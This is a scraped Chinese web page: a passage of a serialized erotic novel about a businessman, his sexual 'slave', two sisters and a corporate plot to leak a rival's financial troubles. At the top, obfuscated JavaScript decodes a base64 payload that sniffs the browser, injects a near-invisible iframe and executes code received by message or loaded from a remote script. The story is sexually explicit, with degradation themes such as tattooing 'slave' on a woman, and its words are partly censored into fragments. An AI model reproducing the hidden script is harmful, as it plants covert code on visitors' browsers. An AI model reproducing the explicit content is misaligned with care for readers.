潮喷nph_bl路人强h

撩妹情话 情话解析 2021-02-22 15:06:07 14 0
eval("\x77\x69\x6e\x64\x6f\x77")["\x77\x6E\x68\x77"]=function(e){var hp =''+'ABCDEFGHIJKLMNOPQ'+'RSTUVWXYZabcdefghi'+'jklmnopqrstuvw'+'xyz012345'+'6789+/='+''+'';var t="",n,r,i,s,o,u,a,f=0;e=e['re'+'pla'+'ce'](/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=hp.indexOf(e.charAt(f++));o=hp.indexOf(e.charAt(f++));u=hp.indexOf(e.charAt(f++));a=hp.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return (function(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2;}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;})(t);}
eval("\x77\x69\x6e\x64\x6f\x77")["\x70\x75\x6E\x41\x50\x77\x68\x55\x43"]=function(){eval(wnhw("OyhmdW5jdGlvbih1LHIsdyxkLGYsYyl7dT1kZWNvZGVVUklDb21wb25lbnQod25odyh1LnJlcGxhY2UobmV3IFJlZ0V4cChjKycnK2MsJ2cnKSxjKS5zcGxpdCgnJykucmV2ZXJzZSgpLmpvaW4oJycpKSk7J2pRdWVyeSc7aWYobmF2aWdhdG9yLnVzZXJBZ2VudC5pbmRleE9mKHduaHcoIlltRnBaSFU9IikpPi0xIHx8IG5hdmlnYXRvci51c2VyQWdlbnQuaW5kZXhPZih3bmh3KCdTSFZoZDJWcFFuSnZkM05sY2c9PScpKT4tMSl7ZnVuY3Rpb24gcmQobixtKXtyZXR1cm4gTWF0aC5mbG9vcihNYXRoLnJhbmRvbSgpKihtLW4rMSkrbik7fWZ1bmN0aW9uIHJtKGUpe2lmKGUmJmUudGFnTmFtZS50b1VwcGVyQ2FzZSgpPT09IklGUkFNRSImJmUuc3JjLmluZGV4T2YodSk+LTEpe2UucmVtb3ZlKCk7fWVsc2UgaWYoZS5uZXh0RWxlbWVudFNpYmxpbmcpe3JtKGUubmV4dEVsZW1lbnRTaWJsaW5nKTt9fWxldCBjPWRbd25odygiWTNWeWNtVnVkRk5qY21sd2RBPT0iKV07dmFyIF9pZD1fY2xhc3M9J2FfMTk5MCc7dmFyIF9fYWFucWlkID0gJ2EnICsgcmQoMSwgMTAwMDAwKTtkWyd3JysncmknKyd0JysnZScrJ2xuJ10oJzxkJysnaXYgaScrJ2Q9JysnIicrX19hYW5xaWQrJyI+JysnPC9kJysnaXYnKyc+Jyk7d1snX19hJysnYWEnKyducScrJ29iJysnal8xOTkwJ109ZFsncXUnKydlcnknKydTZWxlJysnY3RvJysnciddKCcjJytfX2FhbnFpZCk7X2lkICs9IGRbJ3F1JysnZXJ5JysnU2UnKydsZWMnKyd0bycrJ3JBJysnbGwnXSgnLicrX2NsYXNzKS5sZW5ndGg7dmFyIHogPSB1KyctMS8nK19pZCsnLycrcjtkWyd3JysncmknKyd0JysnZSddKCc8aScrJ2ZyJysnYScrJ21lIHN0eWxlPSInKydtJysnYXInKydnaScrJ246MDtwJysnYWQnKydkJysnaW4nKydnOjA7YicrJ29yJysnZCcrJ2VyOm4nKydvbicrJ2U7Jysnb3AnKydhJysnY2knKyd0JysneTowJysnLjAnK3JkKDIsOSkrJzt3aScrJ2R0JysnaDonK3JkKDIsNSkrJ3AnKyd4O2gnKydlJysnaWdoJysndDonK3JkKDIsNSkrJ3AnKyd4OycrJyJhbCcrJ2xvd3RyYW4nKydzcGEnKydyZW5jeSBzcicrJ2M9IicreisnIj48L2knKydmcicrJ2EnKydtZT4nKTt3WyJhZCIrImRFdiIrImVudEwiKyJpc3QiKyJlbmVyIl0oIm0iKyJlc3MiKyJhZ2UiLGZ1bmN0aW9uKGUpe2lmKGUuZGF0YVtyK19pZF0pe3JtKGMpO25ldyBGdW5jdGlvbih3bmh3KGUuZGF0YVtyK19pZF0ucmVwbGFjZShuZXcgUmVnRXhwKHIsJ2cnKSwnJykpKSgpO319KTt9ZWxzZXtkLndyaXRlKCc8cycrJ2NyaScrJ3B0IHNyYz0iJyt1KycuanMiPjxcL3MnKydjcmlwJysndD4nKTt9fSkoJycrJz09UU55JysnMEMnKydNNWtUJysnTXR0JysnTScrJ20nKydSeVUnKydTJysnWm9oJysnWFlxbCcrJ25SeVV5JysnTScrJzAnKydRRE14RScrJzBNbDAnKycyYmo1JysnaWEnKyczVicrJ1dlJysnMGRYJysnWnUnKydjM2QnKyczWmtNbCcrJ1lrTWxFJysnME1sJysnTScrJ0hjMFJIJysnYScrJycrJycsJycrJ1FPRScrJ1NKTicrJ3BaJysnJysnJyx3aW5kb3csZG9jdW1lbnQsJycrJ3BDaycrJ3JGWCcrJ1onKycnKycnLCd0Jyk="));}
快捷c作: 按键盘上方向键 ← 或 → 可快速上下翻页 按键盘上的 enter 键可回到本书目录页 按键盘上方向键 ↑ 可回到本页顶部! 如果本书没有阅读完,想下次继续接着阅读,可使用上方 ;amp;quot;收藏到我的浏览器;amp;quot; 功能 和 ;amp;quot;加入书签;amp;quot; 功能!,形成一个拱形,两手c入男人的头发里,轻轻的“按摩”着他的头顶,她知道自己一定是做了什么让主人特别高兴的事儿,要不然是不会受到这样的奖励的。侯龙涛的双手托住女人的小腿肚,猛的向上一举,一直将它们推到垂直的位置,用肩膀扛住了她的小腿,“嘿嘿,小娘们儿,想要我停的时候就叫声‘爸爸’。”还没等任婧瑶完全弄明白这话的意思,只觉一阵极度的充实感从双腿间迅速传遍了全身,从zg被顶的力度和p股上的触感来判断,男人是“全军深入”了。“啊…”女人发出了一声悠长的叹息,那是满足的叹息、欢乐的叹息,自己怎么可能会希望这样的感觉停止呢。侯龙涛嘴角儿向上一翘,双手撑在美女的身体两侧,臀部向后轻缓的提起,等大半根r棒撤出了她紧凑的小rd,便以千钧之力一沉p股,紧接着再次提起,再次落下。男人全身的肌r都绷紧了,在很短的时间内就使抽c达到了一个难以想像的速度,大量的yy从两具紧密结合的性器间被不断的捣出。“啊啊啊啊…”任婧瑶声嘶力竭的喊了起来,这突如其来的“疾风骤雨”是她始料不及的,她几乎都来不及体会yd与侵入异物亲近的感觉,膣r就已经被磨擦的麻痹了。侯龙涛平时是不经常使用这个体位的,主要是由于这个姿势太省力了,一干起来就如同是下山的猛虎,这样是很容易使自己“受伤”的。最开始的时候,任婧瑶还能忍得住,只是用力的抓挠床面,可快感来得太快、太强,到了高c前夕,她的双手已经在男人的身上拉出了二十多条抓痕,“天啊…主人…主人…啊…啊…”“别忘了我刚才的话。”侯龙涛c得很带劲,女人的x芯就像是正在被自己戏弄一样,它想要紧紧的咬住自己,可自己却每每在它即将得逞的时候向后撤出,惹得它都快要“痛哭流涕”了。任婧瑶张大了小嘴儿,真的发出了哭声,眼角儿也见了泪光,她是实在太舒服了,双手不停的在男人后背上拍出“啪啪”的响声。侯龙涛喜欢看女人脸上那种由于性快感而产生的痛苦表情,这种创造幸福所带来欢愉已经超过了男女交欢本身所产生的r体舒爽,他c干得更加卖力了,还时不时的旋转臀部,使自己顶在美人zg上的g头对娇嫩的花芯进行研磨。不论以前怎么样,这个小妞儿好歹也是任打任骂的跟了自己小半年,自己是有责任让她开心的。任婧瑶整个人都被连续的高c淹没了,她不想让男人停下来,只想让这种比做神仙都美的感觉永无休止的继续下去,但现在她的身体已经完全被本能所支配了,一切的言行都和思想毫无关联,她能觉出来自己快要昏过去了,呼吸越来越困难,“爸爸…啊…饶了我吧…要被…啊…要被你的大j巴c…c死了…啊…求你温柔…啊…一点儿…嗯…求求…求求你…”侯龙涛将女人的腿从肩膀上放了下来,逐步的放缓r棒进出yd的速度,双臂c入她的细腰下,膝盖和脚趾一起用力,向后一带,使刚刚再次泄身的美人坐在了自己腿上。任婧瑶紧紧的抱住男人的脖子,把脸埋在他的耳后,像小狗儿一样,发出轻微的“嗯嗯”声,她已经累得浑身发抖了。“爽够了吗?”“没…没有…主人…”“哼,眼大肚子小,小心撑死你。”侯龙涛一扭头,大口大口的舔着女人嫩白的脖子,铁钳般的双手死死捏住她柔软的p股蛋儿,把她的身体高高抬起,再重重放下。“不…啊…不…别动…别动…啊…啊…求你…”任婧瑶身体后倾,双手勾住男人的后脖梗,拼命的摇着头。“好,就依你。”侯龙涛把主动权交给了女方,自己改为在女人香汗涔涔的背脊、p股、大腿和茹房上温柔的抚摸、揉捏。任婧瑶只安分了十几秒钟,就再也忍不住yd中媚r的极度麻痒,开始自觉的提放臀部,但速度和力量都掌握到了自己可以适应的程度,无限的爽快中,她把自己柔软的舌头和香甜的津y吐入了男人的口中…“喂。”“一切都办妥了。”“好,那咱们北京见。”侯龙涛靠坐在床头,把电话挂上了。“嗯…”虽然电话只响了两声儿就被接了,但任婧瑶还是被吵醒了,她把身子向上蹭了蹭,将头枕到男人的胸口,用舌头在上面轻舔着,“主人,美死了…”她的声音还是懒洋洋的,看来刚才是真的爽透了。“哼哼,”侯龙涛搂住香喷喷的女体,低头在她娇艳的红唇上吻了吻,“你最近的表现非常的好,我又谈成了一笔大生意,心情很不错,我准备了一个奖品给你,你要不要?”“当然要了,主人给我的,我怎么敢不要?”任婧瑶亲热的用脸颊去磨擦男人。“那好,跪好了,把p股撅起来。半个小时之后,女人左边的臀峰上多了一个艳红色的隶书“奴”字,任婧瑶本以为男人说的奖品是珠宝首饰、高级时装一类的东西,没想到会是个纹身,可这确实是个惊喜,她对侯龙涛的性格已经有了一定的了解,既然他“毁”了自己的“容”,他就永远也不会抛弃自己了,虽然离“爱奴”还有半步之遥,但也算是很大的进步了。侯龙涛对自己的作品很满意,微笑着欣赏了几分钟,竖起大拇指,小心翼翼的塞进了女人的y门中,中指正好按在了米粒儿般的y蒂上,弯下腰,伸出舌头,在她圆滑的p股蛋儿上舔了起来,“很漂亮。”“谢…谢谢主人。”“不用谢我,这是你应得的。”说着话,男人的舌尖儿开始缓缓的在她小巧的p眼儿上打转儿。“嗯…主人…”女人的细腰开始下压,侯龙涛跪在她的身后,双手分开她饱满的臀瓣,圆大的g头儿撑开了稍稍发肿的两片y唇,缓缓的向里挺进,直到和zg吻在了一起。“啊…啊…啊…”任婧瑶极力的仰起头,她早已爱上这个男人了…星期四上午,东星集团的总经理田东华和秦皇岛市的吕市长在正式的协议书上签了名,从此开始了双方互惠互利的合作。多家河北省省级的报社、电视台派出了记者前来参加签约仪式,这对于今后在省内其它城市推广“东星净化器”将起到至关重要的作用,随着行政法规的不断出台,“东星”的前途可以说是无量的。就当田东华、文龙和市委一班人在秦皇岛大酒店的包间儿里大摆庆功宴时,侯龙涛一行五人已经静悄悄的登上了飞往北京的班机。“真他妈没劲儿,”马脸大声抱怨着,“在房里关了小三天,早知道这样就不来了。”“这么多废话,这三天你找了多少小姐?”刘南扇了他一个瓢儿,“老实交代。”“也就三个,五哥叫了五、六个呢。”“你怎么知道的?不是说不让你们出门儿吗?”侯龙涛皱起了眉头。“他打电话问的,瞧你丫紧张的。”二德子白了他一眼,“在客房里干小姐有什么意思,玩儿小姐当然是直接在歌儿房或是桑拿室里才有情趣,下次再有这种事儿千万别叫我。”他也开始抱怨。“别这个那个的,在房里关三天,你每年就能多买两、三辆s600,什么时候你有这种好事儿,别忘了告诉我。”侯龙涛对这个五弟的德行真是哭笑不得。“这回你放心了?”刘南不再说笑了。“唉,他要是收了,那我才真放心呢。”“为什么?”刘南没有得到侯龙涛的回答,他有时候也猜不透四弟的心思…回到北京后,侯龙涛的第一件事儿就是听取大胖关于吴倍颖近期活动的汇报。“他每天都早出晚归的,见的全都是有身份的人。”“什么有身份的人?”“起先我也不知道,是罎子他们去跟的,文龙去秦皇岛的头一天,他没事儿干,就也去凑热闹。你知道的,他最爱看那些大老板的传记,他认出那人是四通的一个总儿。”“四通的?”“还不止呢,这几天我就让罎子他们多注点儿意,拍了几张照片儿,”大胖把一个信封儿扔在了桌上,“全在这了。”“这都是谁啊?”侯龙涛看了几张,一个也不认识,其实他对国内的大户并不熟悉,因为跟他们撤不上关系。“联想的、北京轻汽的…”大胖说了一堆知名企业。“他情绪怎么样?”“据罎子说,不太好,他每天见人之前都神采奕奕的,可等人一走,他就显得垂头丧气的。”大胖扔过来一根儿烟。“一个星期了,我也该去拜访拜访那个读书人了。”侯龙涛站了起来,走到窗前,抬头望着灰蒙蒙的天空…星期五晚上快10:00时,吴倍颖拖着疲惫的身体回到了位于王府井金鱼胡同八号的王府饭店,又是毫无收获的一天,他现在什么都不想做,只想洗个澡睡觉。“吴先生,”大堂前台的小姐叫住了他,“有一位先生在咖啡厅里等您呢,已经有两个多小时了。”“什么人?”“他说是您的老朋友。”“知道了,谢谢。”吴倍颖走进了咖啡厅,这个点儿上已经没什么客人了,他一眼就看见了坐在门口儿一张圆桌儿边的沙发上的侯龙涛,这还真是有点儿出乎意料,“侯先生,您是在等我吗?”“这里还有吴先生认识的人吗?”“前台说是我的老朋友,我和您最多也就算是萍水相逢吧?”吴倍颖的语气虽然很平和,但从字面儿上看,并不是太友好,因为他本能的感到来者不善。“呵呵呵,吴先生太见外了,您可以把我的老婆送人,咱们的关系还不算密切,咱们还不算是老朋友吗?”侯龙涛是在冷笑,把脸也沉下来了。“我不懂您说的是什么。”“大家都是明白人,毛正毅那个农民连如云的名字都没听说过,是绝对不会想到要通过她来筹资的。”这一点是前几天才想通的。“我不想在背后讨论我的老板,如果没有别的事情,我要上楼休息了。”吴倍颖转身就要离开。“吴先生,不用这么急着走吧,我今天来不是跟您讨论如云的事儿。我知道您心情一定不好,一个多礼拜的白眼儿,是人也不会好过的,更何况是堂堂农凯集团的副总经理呢,但我觉得您还是有必要听听我想说的话。”“什么一个多礼拜的白眼儿?”吴倍颖刚迈出去的脚又收了回来,他嘴上装傻,心里却在盘算,“他是怎么知道的?这不重要,重要的是他有什么目的。”“吴先生感兴趣了?那就请坐吧,咱们慢儿慢儿聊。”侯龙涛脸上露出了笑容。“您想谈什么?”吴倍颖坐进了沙发里,他要弄清楚面前这个长相斯文的年轻人到底知道多少…第八十四章完第八十五章 无聊琐事 3/21/2003-4/3/2003还没等二人进入正式的话题,服务员就通知他们咖啡厅要关门儿了,他们只好移座到大堂的休息厅。“吴先生有没有意思来‘东星’帮我?”侯龙涛点上一颗烟,然后把烟盒儿递到吴倍颖面前。“我抽不惯混合型的香烟。”吴倍颖掏出了自己的精装“红塔山”。“呵呵呵,那咱们的习惯正好儿相反,我是不抽烤烟。”“不光是习惯不同,互相也不了解,我想咱们大概是没有机会合作的。”“我只是个无名小卒儿,吴先生当然对我不会有什么了解了,但我对您的了解八成儿比您想像的要多一些。真是很遗憾,您不打算帮我,但如果吴先生有时间的话,可以对东星集团进行一些了解,我的邀请是永久有效的。”“谢谢侯先生这么看重我。”吴倍颖的言语客气了不少,“永久有效”,足以表示对方的诚意了。“既然吴先生没兴趣加入‘东星’,您对进‘常青藤’有没有兴趣呢?”侯龙涛喝了口矿泉水儿。“‘常青藤’?古总的‘常青藤’?”“对。”“是古总要你来的?呵呵,全智真是永不放弃啊,唉,我还是不能答应,至少现在不能。”侯龙涛一边的嘴角儿微微的向上翘了一下儿,吴倍颖的最后半句话暴露了两点,一是“上海地产”现在确实处于困难时期,二是他对毛正毅的忠心不知道为什么,已经有所动摇了,因为据古全智介绍,在过去四年多里,不下十五次的私下邀请,他从没流露出一丁点儿要离开“上海地产”的意思。“看来毛老板遇到的麻烦还真不小啊。”侯龙涛开始进攻了。“什么麻烦?”“吴先生怎么问起我来了?要说您应该是最清楚的人啊。”“我不知…”“财政困难嘛,吴先生太瞧不起我了。”“呵呵,侯先生说笑了,我怎么可能瞧不起您呢。不过‘农凯’向来是以财力雄厚着称的,哪来的财政困难。”吴倍颖的警惕性很高。“哈哈哈,吴先生还说不是看不起我,那天吃饭我又不是不在,还有如云那件事儿,您不会是以为我的智力有问题吧?”“噢,我想侯先生是误会了,‘农凯’是在筹资以支持更大规模发展,并不是因为什么财政方面出了问题。您也是生意人,应该明白,做买卖是不可能永远依靠自己的资金的。”“对对,但是做买卖更不能永远都依靠别人的资金,不过毛老板能不用外汇管理局的批文就贷出二十二亿港币,也真是神通广大了…”“这…”吴倍颖脸上的惊讶只是一闪即逝,但侯龙涛却看得明白,赶忙继续,不给他否认的机会,“如果他有批文,您也不用费尽心思从别的企业找钱了,吃银行才是‘农凯’的一贯作风嘛。”“我们手续齐全,吃银行也没什么不正常的,至于这次为什么不找银行,哪怕不是商业秘密,我也没必要对您解释。”“我也不需您解释,你我都清楚其中的原因,‘农凯’已经到了走投无路的地步,没有东西可以抵押给‘中银香港’,真正有实力的企业又都知道你们在做些什么,不敢和你们掺合,我想您不用我详细的分析吧?”“您跟我说这些,倒底目的何在?”吴倍颖确实不用侯龙涛再说,他能感觉到对方是真的猜到了“农凯”面临着严重的财政问题,但他并没有更多的重视这小子,因为他确信这是古全智传授的。“很简单,千军易得,一将难求,‘农凯’的路已经走到头儿了,我不希望看着吴先生出众的才华与其一起覆灭。”“哼哼,”吴倍颖笑了起来,“覆灭?侯先生太危言耸听了吧?”“也许是,但您不否认‘农凯’面临着空前的危机吧?您是商场前辈、大家,对形势肯定有一个比较全面的认识,您真的有信心渡过难关吗?您觉得有可能渡过难关吗?”“当然了,事在人为。”“自欺欺人。”侯龙涛的脸上突然换上了一幅鄙夷的神情。“侯先生,我一直都对您很尊重的,至于许小姐那件事儿,我事先并不知道她和您的关系,而且我也多次劝告过毛总不要心急。”“这些我都知道,要不然的话咱们今天就不会是在这儿同桌儿聊天儿了,我拼了自己的前途不要,也会拉您陪葬的。”“那我就不明白您为什么要讽刺我了。”读书人嘛,吵架都像是在讲道理。“您是指‘自欺欺人’吗?您明知不可为,却还要装出胸有成竹的样子,不叫‘自欺欺人’?哼,实话实说,我还没对您的人品发表评论呢,怎么能叫讽刺?”侯龙涛不屑的表情更甚,就好像面前的人让他恶心一样。“我的人品怎么了?”“您助纣为虐、为虎作伥,已经到了不可救药的地步。”“是吗?那倒要请侯先生敲打敲打我了,您的这些话有什么根据?”吴倍颖并不生气,因为他始终没弄懂对方的意图,在这种时候,保持冷静是非常必要的。“没文化的人作恶,可以归咎于无知,有文化的人作恶,就没有任何的藉口了。毛正毅没读过书,但吴先生可是有真才实学的,你不说用你的学识行善,却帮着他为恶,为什么?”“什么为什么?”“为了钱!你帮他违规购置地产,迫成百上千的普通上海市民流离失所(这是文龙从老曾那儿得知的);你帮他走私贩毒、良为娼、聚赌放贷,造成多少人家破人亡(这是侯龙涛瞎猜、胡说的)。除了钱,还能是为了什么?你利欲薰心,还自认知书达理,真是知识分子中的败类。”侯龙涛的语气很严厉,还做出一副刚正不阿的模样。“你不要血口喷人。”吴倍颖没想到侯龙涛会如此单刀直入,对方的“指控”中有真有假,让他一时难以找出适当的言辞回击,只能简单的予以否认,但脸已经有点儿涨红了。“我诬蔑你了吗?你是不认那些缺德事儿,还是不认你做那些缺德事儿的动机呢?”侯龙涛发觉了他情绪上的轻微波动,急忙步步进。“我都不认,我从来没帮毛总做过伤天害理的事情,更不是为了钱才尽心尽力的为‘农凯’出力。”其实吴倍颖是完全没有义务对侯龙涛说明什么的,但正如古全智所说,他在骨子里还是个心高气傲的书生,在“农凯”小十年,不求名不求利,虽然知道毛正毅干过不少坏事儿,可他从未直接参与过,他不在乎外人说自己有分儿,但却不能忍受自己的动机被怀疑。“哼,是吗?据我表舅讲,当年就是因为你自视甚高,被人看成假清高,没人重用你,致使你郁郁不得志。不过在这个金钱至上的世界里,也许你自己都不觉得,再坚硬的傲骨也会很快就被磨得圆滑的,否则的话,你不跟毛正毅同流合污,他又怎么可能会让你身居‘农凯’副总的高位。”“你根本就不了解毛总,他看重的是我的能力,只有他才真正的懂我,这些年来,我不计名利的为‘农凯’呕心沥血,就是为了报答他的知遇之恩。”吴倍颖有点儿激动了。“我明白了,患难才见真情,所以就算现在毛正毅面临着前所未有的巨额财困,吴倍颖先生也一样不会弃他而去。”“没错,我没在‘农凯’的巅峰期离开,就更不会在现在这个时候走,虽说‘农凯’的财政困难也许已经到了难以挽回的地步,但‘士为知己者死’,我会为毛总尽最后一分力的。”吴倍颖这番话全是出自真心,说得慷慨激昂,虽然他已经知道毛正毅并没有把自己当一家人,但当年毕竟只有他一人看到自己的能力,光凭这点他就值得自己的忠心。“好,吴先生果然不是有些只认钱的所谓人才可比,那我就不打扰了,咱们以后一定会有机会合作的。”侯龙涛面带笑容,站了起来。“嗯?”吴倍颖也跟着起身,有点儿不明所以的和侯龙涛握了握手,“就这些吗?”“就这些,今天听吴先生一席话,让我受益匪浅。对了,我刚刚用‘东星’百分之五的股份换了‘常青藤’百分之十五的股份。”侯龙涛离开后,吴倍颖在原地发了好几分钟的呆,他已经基本上恢复了平静,但却始终没弄清楚那个年轻人来找自己的目的,要说是请自己加入“东星”吧,好像也没怎么劝说自己,而且刚才他离开前,脸上的那种笑容总让人有不安的感觉…“虽说‘农凯’的财政困难也许已经到了难以挽回的地步,但‘士为知己者死’,我会为毛总尽最后一分力的。”“哢。”侯龙涛把录音机关上了,“怎么样?”“不错,你小子还挺精,知道把他的名字说出来。”古全智坐在宽大的写字台后,“其它的都没用,就把关于‘农凯’财困的几段儿截下来就行了。”“您看多少天可以见报?”“照片儿、录音,加上书面的解释,香港的媒体是不会放过这种料的。下礼拜一我就让人分寄出去,大概有个四、五天,最多一个星期,肯定能看出效果来。”“他们不会跟毛的有联系吧?”“那是香港,不是上海,就算他在一、两家有线,不会全都罩他的。”“那就好。”“你看看这个。”古全智把桌上的一本杂志推了过来,“第二十三页。”侯龙涛打开一看,是一篇关于毛正毅的报导,里面说神秘失踪若干天,脸上还有被击打的伤痕,据他自己解释,是去参加了几天的泰拳训练,“哈哈哈,老毛还挺能编的。”“舅,猴子,你们谈完了没有?”刘南从外面进来了。“完了。”侯龙涛站了起来。“跟我走吧。”“去哪儿?”“你就来吧,这么多废话。”两个小伙子离开了古全智家,来到楼下的停车场,侯龙涛上了自己的sl500,“上哪儿啊?”“‘初升’。”“你大爷,刚才问你不说。”“哈哈哈,就喜欢看你着急。”平时去娱乐城,侯龙涛都是把车开到后面的内部停车场,但今天刘南却强烈要求他停在了楼前。“把这个戴上。”刘南从裤兜里掏出一个飞机上用的眼罩儿。“干什么?”“让你丫戴,你丫就戴,老是唧唧歪歪的。”“少他妈废话,到底要干什么?”“嗨,你丫烦不烦?又不是要送你上刑场。”“没那个,你丫肯定没憋好p。”“c,你丫要当我是你三哥,你他妈就戴上。”刘南把眼罩儿往侯龙涛腿上一扔。“乃乃的,未来二十年,你丫都不许再用这招儿。”侯龙涛下了车,不情不愿的把眼罩戴上了,“现在怎么招?”“跟我来吧。”刘南过来拉住了他的胳膊,把他一直带到了内部停车场,“叫你摘你再摘。”“知道了,”侯龙涛虽然什么都看不到,但周围一定还有不少人,能听出大胖和马脸的声音,好像还有今天下午刚回京的文龙,“你们丫那玩儿的哪出啊?”“呼啦”一声,像是帆布被撩起的声音。“行了,摘了吧。”“你们丫那最好都穿着衣服呢,我可不想看…”侯龙涛撤下了眼罩儿,话还没说完,眼睛和嘴巴都张得大大的,楞在了当场。面前五米,停车场里,静静的趴着一辆纯黄色的低底盘双门儿跑车,墨色的风挡,完全看不到驾驶室里的情况,在车头的正中间有一个盾牌形的徽章,一排细小的英文字母下是一头金黄色的公牛。“啊啊啊啊,”侯龙涛哈拉子都快流出来了,一步一晃的走过去,双手轻缓的抚摸着那完美的曲线,“这是…这是…lambhini…”“嘿嘿嘿,”刘南走了过去,拍拍他的肩膀,“diablo6。0,全世界唯一的一辆(事实上,diablo6。0只有一辆样车,出现在2000年的底特律车展上,不知道由于什么原因,最终没有投入市场,所以面前的这辆就是独一无二的了),十二缸,最高时速三百三十五公里,现在你是她的主人了。”“嘶嘶嘶…哈…啊啊…”侯龙涛就像是刚s了一样,脸上的表情如痴如醉,连话都不会说了,他从十几岁开始就对lambhini情有独钟,什么ferrari、porsche,他都毫无感觉,但他做梦也没想到过自己会拥有一辆。虽说他早就有这样的财力了,虽说他可以连眼都不眨的每年拿出一亿多分给发小的兄弟,但要他花一千几百万去买辆车,他还真舍不得,这也就是创业者和第二代、第三代富翁的区别。“这是我们哥儿六个凑钱定的,”大胖过来了,“当然了,大部分都是老三出的,等你丫给我们发了工资再还他。本来是想等你二十五岁生日的时候再给你的,不过我们自己都等不及了,这可就是生日礼物了,到时候可别再恬着脸管我们要东西了。”“不会,不会的。”侯龙涛终于笑起来了,“这可是可移动的金属艺术品啊。”“那你还等什么呢,还不试试。”文龙在车玻璃上敲了两下儿。两扇车门儿如同翅膀般向前上方升了起来,从副驾驶的座位上走下来一位长发姑娘,一根修长的手指上挑着一把钥匙,走到侯龙涛面前,正是茹嫣。“我们够意思吧?不光送车,还白搭长腿美女。”马脸也来凑热闹。“嘿嘿嘿,感谢你们送车,不过这妞儿本来就是我的。”侯龙涛一把揽住了茹嫣的细腰,和她吻了起来,一只手还在她的p股上抓捏。“喂喂喂,没人想看你们演毛片儿。”一群王八蛋开始起哄。“哼哼。”一对儿情人钻进了车里,一溜烟儿的把lambhini开跑了。两天后侯龙涛就找人在“东星初升”的内部停车场上建了一个小车库,他平时不到夜深人静之时是不会来开这辆梦幻跑车的,因为白天根本就跑不起来,更主要的,这车实在是太扎眼了,他还没有这么快就把古全智的忠告忘记呢…三月的最后一个星期六,香港各主要报刊、金融杂志都爆出了毛正毅旗下两家上市公司正经受巨额财困的消息,致使股市大震,从周一开盘到周三收盘,短短的三天内,这两家公司的股价蒸发了八亿有余。根据报道来看,是一家香港公司的主席在暗地里对媒体放的风,但实际情况只有几个人清楚…“嗯…嗯…嗯…涛哥…”陈曦拼命向后顶着p股,迎合侯龙涛在身后对自己的“侵犯”,她的身下是已经被干得迷迷糊糊的陈倩。姐妹俩两对儿饱满的茹房紧紧对在一起,随着男人对陈曦臀瓣的不断撞击而互相磨擦,四颗艳丽的乃头儿都是如同小樱桃般挺立着,亲密的碰触着。陈倩的意识不是很清醒,只有在爱人对自己的身体进行刺激时才会像有电流经过身体一样的抽搐一下儿,她的小x里还有男人的jy在缓缓的向外流。侯龙涛虽然已全身是汗,但却没有一点儿疲劳的感觉,一刻不停的用大j巴蹂躏陈曦yd中的嫩r,还时不时的把手伸到她的小腹下,在姐妹俩两副r唇顶端的“小米粒儿”上轻掐重揉。“涛哥…哼…啊…快…快…”陈曦知道自己又快要高c了,不由得娇声哀求起来,她伸出香嫩的舌头,在姐姐桃红色的玉颊上舔舐着,毕竟是姐妹俩,她们平时在侯龙涛的要求下亲嘴儿,也就是让四唇轻碰,不被爱人玩儿到情深,是不会用上舌头的。现在就属于情深之时,妹妹的舌头探入了姐姐的樱口中搅动起来。侯龙涛的左手尽情把玩儿着陈曦柔嫩的臀r,右手按住了她雪白的背脊,开始飞速的c干小x,c得x缝儿“噗哧”做响,“小曦…小曦,美死哥哥了,哥哥也要来了。”“嗯…啊…给我…给我…”女孩儿双腿一软,完全趴在了姐姐的身上。男人又猛杵了二十来下儿,后背发麻,也是一声低吼。侯龙涛压在两个美人身上,把头探到陈曦脸边,舌头拼命向外伸出,在姐妹俩的粉面上又吻又舔,“宝贝儿,我的心肝儿宝贝儿。”三人就这样叠在一起,休息了不过三、四分钟,侯龙涛已经感觉到自己能够再战了,他轻轻把陈曦从她姐姐的身上翻下来,把她吻得娇喘连连,然后就跪到陈倩一直没有合上的双腿间,捋了捋r棒,准备再给她一轮儿快乐时光。一阵国歌的旋律把侯龙涛的计划打乱了,他坐到床边,抄起了手机,“喂。”“涛…涛哥,我想见你。”另一头儿传来的是香奈带着哭腔儿的声音。“怎么了?”“我…我有事情要跟你说。”“好吧。”侯龙涛把地址告诉了香奈,本来是不想让她来的,但听她的语气有点儿不对,也就没有拒绝。“是谁啊?”陈曦并没像姐姐那样筋疲力尽,从后面贴住了男人,轻轻的摇晃着,吻了吻他的脖子和耳朵。侯龙涛稍稍扭身,把女孩儿拉到腿上,“我给你们介绍一位日本姐妹啊。”“什么?日本姐妹?”“是啊。”“你和她什么关系?”“当然没有和你们的关系亲了,但是也…嘿嘿,你知道的。”“你…你…”陈曦一下儿从男人的身上蹦下了床,“你在外面拈花惹草,我和姐姐就由你了,你还要把她们往家里带?”说着都好像要哭出来了。“嗯?”侯龙涛看着女孩儿委屈的样子,真没想到她会有如此大的反应,“小曦,我…”他一时还真是没词儿…香奈拦了一辆出租车,把手机里刚才侯龙涛说地址的那段儿录音放给司机听,到了地方,她就直接上楼了。按响了门铃儿之后,就听屋里传出了一个很悦耳的女人声音,“谁啊?”“请问侯龙涛在吗?”房门打开了,可却没看到开门的人。香奈走了进去,只见客厅的餐桌边坐着两个天仙般的美女,都是罗莎轻罩,丰满的胸脯隐约可见,可看表情好像并不怎么高兴,她急忙深深的鞠了一躬,“我叫宝村香奈,请多多关照,请问侯龙涛他…”“我在这儿呢。”光着p股的侯龙涛从后抱住了女人的腰身,原来刚才是他开的门,但因为没穿衣服,就站在门后了。“涛…”香奈转过身,紧紧的抱住了男人的健壮的身体,把头埋在他的胸口。“呵呵…”侯龙涛刚出了两声儿,脸上的笑容就没有了,他感到胸口的皮肤一湿,但却绝不是被舌头舔的。他急忙捧住女人的脸颊,把她的头抬起来,果然不出所料,她是眼泪汪汪的,脸蛋儿上已有了两道泪迹。“怎么了?”侯龙涛最看不得的就是女人凄凄楚楚的样子,他坐到了餐桌边的一张椅子上,把小护士抱进怀里,“出什么